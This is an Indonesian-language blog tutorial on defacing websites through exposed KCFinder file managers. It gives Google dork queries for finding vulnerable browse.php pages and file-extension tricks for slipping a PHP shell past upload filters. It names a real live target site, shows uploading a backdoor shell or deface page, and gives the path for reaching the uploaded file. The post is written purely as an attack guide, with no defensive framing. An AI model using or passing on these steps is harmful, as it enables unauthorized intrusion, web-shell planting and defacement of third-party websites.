» » » Cara Deface Metode KCFinder

Cara Deface Metode KCFinder

Add Comment ,
Bahan - Bahan
1. Dork : inurl:/kcfinder/browse.php
              inurl:/assets/kcfinder/browse.php
              inurl:/panel/kcfinder/ site:com
*kembangin lagi biar dapet yg fresh 
2. Exploit : /browse.php 
3. Shell : biasanya jika ingin upload shell di kcfinder kita harus membypass extensi shell nya
            *extensi yang biasa di gunakan : .php5 .php2 .php.fla .php3 .php.pjpeg

- Langsung saja kita dorking ke mbah google 
- Disini saya memiliki live target : https://www.iru-miru.com/js/kcfinder
- Lalu kita masukan exploit nya : https://www.iru-miru.com/js/kcfinder/browse.php
- Sekarang kita tinggal upload shell backdoor atau script deface. 
- Klik upload lalu pilih file shell backdoor atau script deface kalian dan akan seperti ini.
 - Lalu jika sudah meng upload shell atau script kita cek hasil nya
 - Untuk mengakses file yg kalian upload meng akses nya seperti ini
    *site.com/[path]/kcfinder/upload/files/filekalian
 - Bisa dibilang seperti ini :
    https://www.iru-miru.com/js/kcfinder/upload/files/dot.html

Oke mungkin cukup sekian tutorial kali ini
See you on the next tutorial...

Related Posts:

0 Response to "Cara Deface Metode KCFinder"

Post a Comment

Subscribe to: Post Comments (Atom)